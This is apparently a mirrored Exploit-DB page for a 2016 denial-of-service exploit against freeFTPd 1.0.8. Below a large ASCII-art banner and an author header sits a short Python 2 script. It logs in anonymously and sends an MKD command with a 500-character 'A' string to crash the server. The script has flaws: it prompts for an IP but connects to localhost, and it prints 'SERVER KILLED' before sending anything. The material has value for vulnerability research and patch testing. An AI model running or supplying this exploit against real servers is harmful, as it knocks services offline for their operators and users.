freeFTPd 1.0.8 – ‘mkd’ Denial of Service

  • 作者: ScrR1pTK1dd13
    日期: 2016-10-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40647/
  • from ftplib import FTP

print '''


 `,;'++';,`
`'++++++++++++++++;` 
 .+++++++++++++++++++++++'`
 ;++++++:``:++++++:
 '++++'` , +`. :; .`` .'++++;
 :++++,'+ `+.+.+`+':+:+ +:` +:++++,
++++,`++`+.+`+':+.+ +:'.+. :++++ 
,+++; +` +:':+`+',+`+,++.+:+ +,'+++. 
 '+++``++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++;
+++;`: ++' +'+++ :++;++,+:+ '+++ 
 +++, ++' ,+ .;+++++',` : +',+ :+++
+++` ++ +:+ +: .+++++++++++++++;:++'+,,`,+++ 
 +++``+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++
'++`++ +,.`'++++++++++++++++++++++++. +;.+`+,++; 
 :++,+:++`',+++++++++++++''++++++++++++`+.+: :++.
 ++;. +:+:+++++++++'.`;++++++++..+' +++++
+++;++ +:++++++++,.+++++++;;:+;+ +++ 
 :++;+,++`+++++++,`++++++'+,+,.+ `++.
 ++: `+`+'.++++++';+++++'+`;++'++
'++ ,+,'++++++,.+++++;++ ++: 
++. ' +++++++` +++++. ` '+.:++ 
 ;++ +; + ;+++++` +++++ :++ ; ++:
 ++, '++ `+++++,`++++++` `. :++
,++` ;+: +++++':++++`,+++` 
++; .+++` .++++++++++'++:: ++' 
++` ;+':: +++++. ++++` '`+++`.++ 
 .++ `+++++++'+++++:++`
 '++ `++;'++++` ++++++;
 ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++: 
 ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
 ++ +;,`;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++`.,. +++++
+++ '..': ,++'`,+++``++++
++++;+` ++++:++++++'++++++'++++
+++ :.'`; ++++: ++` :+,++` ,+: ++++
'++ `+++. ++++; : +: +,++++
;++:` ++++'`+++++
,++ `+;;+ +++++;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:;;;;;;;;;;;;;;++++++.
`++++,+ +++++:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++' 
 ++` `, ;++++ ++++++++++++++++++++++++++++++++++++:++++++++++++++++++++
 ++` .+++.`++++:++++++++++++++++++++++++++++++++++++`++++++++++++++++++, 
 ++: ','+: +++++:+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++++++:,:,,:,,+++,.
 ;+++:`, '++++`+++++. +++++`++++'.+'++,
++ ++++++++:+++++++++++;++++++.+++ 
++, ';`+' +++++`++++++++++++ ++++` ++. :++ 
'++ :++;, .+++++ ++++++` ++++++,+++++++: 
`++ +` :+, +++++:.++++++':++++++;.++++. +``++
 ++' ;++``+++++`,+++++++'` :+++++++; +++++:++`+++
 ,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++`
+++ :+'++++++++++++++++++++++++++++` +++++. ;+` ,+++ 
,++ :++`;+` ++++++` :++++++++++++++++++'+++++' `+,+;`;`++. 
 +++ : ++.+ `++++++::++++++++++++++;,+++++' ++`++++
 `++,+;+``+++++++``:++++++++:` ++++++' ++,+; ;++`
'++:+`'++++++++``+++++++;+++ ;`++; 
 +++`:`++++++++++:,++++++++, +,++ +++
+++ +++;':+++++++++++';::;'+++++++++++ ;+ +,'+++ 
,++++++.+.:+++++++++++++++++++++++++.'' ++ ++++` 
 ;++'` +`+`;. `+++++++++++++++++++++, :,+,:+:+++,
;+++,++:'++` ,+++++++++++++++;++ .++ `+++: 
 ;+++ + +`++;.;'++++':` ++.+':++ +++:
:+++``++, :;+`+;::+ +,+`+. .+++, 
 .+++'`, +`:'+ +,+` +, +:+.++:';+ ++++++`
 ++++.+':++: +;+` ': +:+ +.+ +' :++++
:++++. . +,+,;+'` '; :'+`+'+,++++, 
+++++:` +`+'` '; `++` ;++++' 
 `++++++: ;'+:++++++`
 `+++++++':. `,:+++++++' 
.++++++++++++++++++++++. 
 `:'++++++++++++', 

##############################################
#Created: ScrR1pTK1dd13#
#Name: Greg Priest #
#Mail: ScrR1pTK1dd13.slammer@gmail.com # 
##############################################


# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64

'''

ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)